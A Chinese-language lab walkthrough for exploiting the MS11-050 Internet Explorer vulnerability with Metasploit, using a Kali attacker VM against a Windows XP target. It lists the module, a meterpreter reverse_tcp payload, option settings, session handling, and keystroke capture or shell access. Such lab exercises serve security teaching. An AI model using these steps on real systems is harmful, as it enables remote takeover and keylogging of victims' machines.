IE浏览器渗透攻击——MS11050安全漏洞
实验前准备
1、两台虚拟机,其中一台为kali,一台为windows xp sp3(包含IE7)。
2、设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。
实验步骤:
1、在kali终端中开启msfconsole。
2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,进入该漏洞模块。
3、输入info
查看信息:
对应的targets:
4、设置对应的载荷set payload windows/meterpreter/reverse_tcp
;
5、show options
查看需要设置的相关信息:
6、设置相关信息
set LHOST ‘kali Ip’
set LPORT XXXX
set URIPATH XXX
7、exploit
,如下图所示,有靶机需要访问的ip地址:
8、在靶机IE上输入网址,并在靶机上查看信息。
- 靶机端IE:
- kali中显示一个session 1已经创建:
9、输入命令sessions -i 1
,开始连接
9、已经攻击成功了,开始按键抓取
- 或者获取shell